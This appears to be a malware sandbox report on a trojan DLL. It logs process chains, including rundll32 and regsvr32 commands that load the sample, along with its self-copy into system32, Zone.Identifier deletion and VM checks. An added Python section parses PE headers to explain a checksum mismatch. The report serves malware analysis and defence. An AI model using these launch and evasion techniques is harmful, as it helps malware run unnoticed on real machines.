                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000E1E05_2_000000018000E1E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000C6085_2_000000018000C608
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800216185_2_0000000180021618
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180013E285_2_0000000180013E28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002AE445_2_000000018002AE44
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000D26C5_2_000000018000D26C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800252785_2_0000000180025278
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000EE985_2_000000018000EE98
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800046A85_2_00000001800046A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001AAB85_2_000000018001AAB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180004ACA5_2_0000000180004ACA
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800132F05_2_00000001800132F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180026B105_2_0000000180026B10
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001DBE85_2_000000018001DBE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001FC0C5_2_000000018001FC0C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000580C5_2_000000018000580C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800220105_2_0000000180022010
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001481C5_2_000000018001481C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002A42C5_2_000000018002A42C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800118345_2_0000000180011834
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180021C3C5_2_0000000180021C3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000703C5_2_000000018000703C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000AC485_2_000000018000AC48
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000FC485_2_000000018000FC48
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800244585_2_0000000180024458
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800064585_2_0000000180006458
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001C05C5_2_000000018001C05C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001A4605_2_000000018001A460
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800298885_2_0000000180029888
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001D49C5_2_000000018001D49C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180008CA05_2_0000000180008CA0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800248A85_2_00000001800248A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180015CB05_2_0000000180015CB0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800124B45_2_00000001800124B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000C4B45_2_000000018000C4B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800288B85_2_00000001800288B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800024B85_2_00000001800024B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000D8C45_2_000000018000D8C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800250CC5_2_00000001800250CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800190D45_2_00000001800190D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180017CE45_2_0000000180017CE4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800264F05_2_00000001800264F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800014F85_2_00000001800014F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180020CFC5_2_0000000180020CFC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800091005_2_0000000180009100
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002C9045_2_000000018002C904
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800179085_2_0000000180017908
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800215105_2_0000000180021510
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000F9175_2_000000018000F917
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000F1285_2_000000018000F128
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001CD385_2_000000018001CD38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180016D3C5_2_0000000180016D3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001F9445_2_000000018001F944
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001D9505_2_000000018001D950
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800131505_2_0000000180013150
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001ED505_2_000000018001ED50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001E9605_2_000000018001E960
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180019D605_2_0000000180019D60
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001C9645_2_000000018001C964
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001C5685_2_000000018001C568
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180001D685_2_0000000180001D68
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001496C5_2_000000018001496C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180002D705_2_0000000180002D70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800245745_2_0000000180024574
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800021785_2_0000000180002178
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180024D805_2_0000000180024D80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800185985_2_0000000180018598
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800035985_2_0000000180003598
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001F1A45_2_000000018001F1A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002A9A85_2_000000018002A9A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800119A85_2_00000001800119A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180025DAC5_2_0000000180025DAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180018DAC5_2_0000000180018DAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800269B05_2_00000001800269B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800059B85_2_00000001800059B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800029BC5_2_00000001800029BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800141C05_2_00000001800141C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800125C45_2_00000001800125C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800121CC5_2_00000001800121CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000BDD05_2_000000018000BDD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800075D45_2_00000001800075D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800095DC5_2_00000001800095DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000F9E85_2_000000018000F9E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800026105_2_0000000180002610
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800196185_2_0000000180019618
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001FA385_2_000000018001FA38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000A2705_2_000000018000A270
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180019E785_2_0000000180019E78
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001DA805_2_000000018001DA80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800246985_2_0000000180024698
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800176B85_2_00000001800176B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002CAD05_2_000000018002CAD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180011AD05_2_0000000180011AD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180008AD85_2_0000000180008AD8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800296EC5_2_00000001800296EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000A6EC5_2_000000018000A6EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800193005_2_0000000180019300
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001BB045_2_000000018001BB04
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002870C5_2_000000018002870C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000131C5_2_000000018000131C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000671C5_2_000000018000671C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180029B285_2_0000000180029B28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180012F285_2_0000000180012F28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000BB285_2_000000018000BB28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001EB305_2_000000018001EB30
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800203345_2_0000000180020334
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800107585_2_0000000180010758
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001435C5_2_000000018001435C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180009F5C5_2_0000000180009F5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800293685_2_0000000180029368
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800207685_2_0000000180020768
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800173785_2_0000000180017378
Source: C:\Windows\System32\regsvr32.exe | Section loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exe | Section loaded: sfc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: xboxlivetitleid.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cdpsgshims.dll
Source: Ns2al4764F.dll | Virustotal: Detection: 35%
Source: Ns2al4764F.dll | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll64.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\Ns2al4764F.dll"
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Ns2al4764F.dll",#1
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\Ns2al4764F.dll
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Ns2al4764F.dll",#1
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\Ns2al4764F.dll,DllRegisterServer
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\GfWDwmUjKsXua\cGZwFaJkDV.dll"
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\Ns2al4764F.dll,DllUnregisterServer
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknown | Process created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
Source: unknown | Process created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k unistacksvcgroup
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Windows\System32\svchost.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\Ns2al4764F.dll",#1
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\Ns2al4764F.dll
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\Ns2al4764F.dll,DllRegisterServer
Source: C:\Windows\System32\loaddll64.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\Ns2al4764F.dll,DllUnregisterServer
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Ns2al4764F.dll",#1
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\GfWDwmUjKsXua\cGZwFaJkDV.dll"
Source: C:\Windows\System32\svchost.exe | Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Windows\System32\regsvr32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D105A4D4-344C-48EB-9866-EE378D90658B}\InProcServer32
Source: C:\Windows\System32\svchost.exe | File created: C:\Users\user\AppData\Local\packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl
Source: classification engine | Classification label: mal80.troj.evad.winDLL@27/6@0/3
Source: C:\Windows\System32\regsvr32.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\regsvr32.exe | Code function: 5_2_00000001800046A8 CreateToolhelp32Snapshot,Process32NextW,Process32FirstW,FindCloseChangeNotification
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Ns2al4764F.dll",#1
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1524:120:WilError_01
Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\rundll32.exe | Automated click: OK
Source: C:\Windows\System32\svchost.exe | Automated click: OK
Source: Ns2al4764F.dll | Static PE information: Image base 0x180000000 > 0x60000000
Source: Ns2al4764F.dll | Static PE information: DYNAMIC_BASE, NX_COMPAT
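The two static PE rows directly above, and the "real checksum: 0x85ab6 should be: 0x8d256" row further down, are read straight out of IMAGE_OPTIONAL_HEADER. The Python below is an added example and is not code from the Joe Sandbox report or from the sample: it parses ImageBase and DllCharacteristics and recomputes the CheckSum with the dword-sum-and-fold algorithm that imagehlp's MapFileAndCheckSum uses, so a mismatch like the one reported can be reproduced offline. The header-only PE it builds for its self-test is constructed here and does not come from Ns2al4764F; pass a file path to check a real binary.

```python
import struct
import sys

# IMAGE_DLLCHARACTERISTICS_* bits from the PE/COFF specification.
DLL_CHARACTERISTICS = {
    0x0020: "HIGH_ENTROPY_VA",
    0x0040: "DYNAMIC_BASE",
    0x0080: "FORCE_INTEGRITY",
    0x0100: "NX_COMPAT",
    0x0200: "NO_ISOLATION",
    0x0400: "NO_SEH",
    0x0800: "NO_BIND",
    0x1000: "APPCONTAINER",
    0x2000: "WDM_DRIVER",
    0x4000: "GUARD_CF",
    0x8000: "TERMINAL_SERVER_AWARE",
}


def optional_header_offset(data: bytes) -> int:
    """File offset of IMAGE_OPTIONAL_HEADER: e_lfanew + 'PE\\0\\0' + 20-byte IMAGE_FILE_HEADER."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    return e_lfanew + 4 + 20


def pe_checksum(data: bytes) -> int:
    """Recompute the optional-header CheckSum (same algorithm as imagehlp MapFileAndCheckSum).

    Sum the file as little-endian dwords with end-around carry, skipping the CheckSum
    field itself, fold the result to 16 bits, then add the file length.
    """
    checksum_off = optional_header_offset(data) + 0x40
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == checksum_off:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        if total > 0xFFFFFFFF:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def parse_pe(data: bytes) -> dict:
    """Extract the fields behind the report's static PE rows and verify the stored checksum."""
    opt = optional_header_offset(data)
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x20B:          # PE32+: 64-bit ImageBase at +24
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    elif magic == 0x10B:        # PE32: 32-bit ImageBase at +28
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    stored = struct.unpack_from("<I", data, opt + 0x40)[0]
    dll_chars = struct.unpack_from("<H", data, opt + 0x46)[0]
    computed = pe_checksum(data)
    return {
        "pe32plus": magic == 0x20B,
        "image_base": image_base,
        "image_base_above_0x60000000": image_base > 0x60000000,
        "dll_characteristics": [n for bit, n in sorted(DLL_CHARACTERISTICS.items()) if dll_chars & bit],
        "stored_checksum": stored,
        "computed_checksum": computed,
        "checksum_ok": stored == computed,
    }


def build_minimal_pe(image_base=0x180000000, dll_characteristics=0x0140, checksum=0) -> bytes:
    """Constructed header-only PE32+ image for self-test; it is not derived from the sample."""
    dos = bytearray(0x40)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                  # e_lfanew
    # Machine=AMD64, 0 sections, no symbols, 240-byte optional header,
    # Characteristics = EXECUTABLE_IMAGE | LARGE_ADDRESS_AWARE | DLL
    file_hdr = struct.pack("<HHIIIHH", 0x8664, 0, 0, 0, 0, 240, 0x2022)
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0x00, 0x20B)                  # PE32+ magic
    struct.pack_into("<Q", opt, 0x18, image_base)
    struct.pack_into("<I", opt, 0x40, checksum)
    struct.pack_into("<H", opt, 0x46, dll_characteristics)
    return bytes(dos) + b"PE\0\0" + file_hdr + bytes(opt)


if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_minimal_pe()
    info = parse_pe(blob)
    print(f"image base {info['image_base']:#x}, flags {info['dll_characteristics']}")
    print(f"real checksum: {info['stored_checksum']:#x} should be: {info['computed_checksum']:#x}"
          f" ({'ok' if info['checksum_ok'] else 'MISMATCH'})")
```

Two caveats when reading these rows: 0x180000000 is simply the default image base the MSVC linker assigns to 64-bit DLLs, so that row on its own carries no signal. The checksum row is the informative one: a stored value that is nonzero but wrong (here 0x85ab6 against a computed 0x8d256) means the bytes were changed after the linker wrote the field, which is what packing or post-build patching leaves behind, whereas a field that is simply zero is common in unsigned builds.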
                      Source: Binary string: msacm32.pdb source: regsvr32.exe, 00000005.00000002.757701219.0000000000145000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: msacm32.pdbGCTL source: regsvr32.exe, 00000005.00000002.757701219.0000000000145000.00000004.00000010.00020000.00000000.sdmp
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_000000018001AFFD push ebp; retf 2_2_000000018001AFFE
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_00000001800051D1 push ebp; iretd 2_2_00000001800051D2
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_000000018001BA32 push ebp; retf 2_2_000000018001BA33
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_0000000180004E83 push es; ret 2_2_0000000180004E84
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_000000018001B694 push es; ret 2_2_000000018001B6E9
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_000000018001BADD push ebp; iretd 2_2_000000018001BADE
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_000000018001B717 push ebp; iretd 2_2_000000018001B718
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_000000018001AF4E push ebp; retf 2_2_000000018001AF4F
Source: C:\Windows\System32\regsvr32.exe | Code function: 2_2_00000001800253BC pushfd; retn 0057h 2_2_00000001800253BD
Source: C:\Windows\System32\rundll32.exe | Code function: 3_2_000000018001AFFD push ebp; retf 3_2_000000018001AFFE
Source: C:\Windows\System32\rundll32.exe | Code function: 3_2_00000001800051D1 push ebp; iretd 3_2_00000001800051D2
Source: C:\Windows\System32\rundll32.exe | Code function: 3_2_000000018001BA32 push ebp; retf 3_2_000000018001BA33
Source: C:\Windows\System32\rundll32.exe | Code function: 3_2_0000000180004E83 push es; ret 3_2_0000000180004E84
Source: C:\Windows\System32\rundll32.exe | Code function: 3_2_000000018001B694 push es; ret 3_2_000000018001B6E9
Source: C:\Windows\System32\rundll32.exe | Code function: 3_2_000000018001BADD push ebp; iretd 3_2_000000018001BADE
Source: C:\Windows\System32\rundll32.exe | Code function: 3_2_000000018001B717 push ebp; iretd 3_2_000000018001B718
Source: C:\Windows\System32\rundll32.exe | Code function: 3_2_0000000180007B3F push esp; retf 3_2_0000000180007B40
Source: C:\Windows\System32\rundll32.exe | Code function: 3_2_000000018001AF4E push ebp; retf 3_2_000000018001AF4F
Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_000000018001AFFD push ebp; retf 4_2_000000018001AFFE
Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_00000001800051D1 push ebp; iretd 4_2_00000001800051D2
Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_000000018001BA32 push ebp; retf 4_2_000000018001BA33
Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_0000000180004E83 push es; ret 4_2_0000000180004E84
Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_000000018001B694 push es; ret 4_2_000000018001B6E9
Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_000000018001BADD push ebp; iretd 4_2_000000018001BADE
Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_000000018001B717 push ebp; iretd 4_2_000000018001B718
Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_0000000180007B3F push esp; retf 4_2_0000000180007B40
Source: C:\Windows\System32\rundll32.exe | Code function: 4_2_000000018001AF4E push ebp; retf 4_2_000000018001AF4F
Source: C:\Windows\System32\regsvr32.exe | Code function: 5_2_00000001800051D1 push ebp; iretd 5_2_00000001800051D2
Source: C:\Windows\System32\regsvr32.exe | Code function: 5_2_0000000180004E83 push es; ret 5_2_0000000180004E84
Source: C:\Windows\System32\regsvr32.exe | Code function: 5_2_0000000180007B3F push esp; retf 5_2_0000000180007B40
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FFFEFB97BE8 DecodePointer,_errno,LoadLibraryA,GetProcAddress,_errno,GetLastError,GetLastError,EncodePointer,FreeLibrary,_errno,_errno,2_2_00007FFFEFB97BE8
                      Source: Ns2al4764F.dllStatic PE information: real checksum: 0x85ab6 should be: 0x8d256
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\Ns2al4764F.dll
                      Source: C:\Windows\System32\regsvr32.exePE file moved: C:\Windows\System32\GfWDwmUjKsXua\cGZwFaJkDV.dllJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\GfWDwmUjKsXua\cGZwFaJkDV.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\system32\RpNDUefDG\WguXjQBzdqxftR.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\system32\JfnYivS\pkmSmSGKCcGBpG.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 6340Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 6384Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 6784Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\regsvr32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_2-10063
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000D26C FindFirstFileW,FindNextFileW,FindClose,5_2_000000018000D26C
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_2-10065
                      Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: regsvr32.exe, 00000005.00000003.314249030.000000000058B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000002.758256280.000000000058E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.314276869.000000000058E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.314223162.0000000000561000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWr;[
                      Source: svchost.exe, 00000014.00000002.664483911.0000017546A61000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @Hyper-V RAW
                      Source: regsvr32.exe, 00000005.00000003.314249030.000000000058B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000002.758083943.0000000000574000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000002.758256280.000000000058E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.314276869.000000000058E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000005.00000003.314223162.0000000000561000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.664475919.0000017546A54000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.664222835.0000017541229000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.405535794.0000021A88EEC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
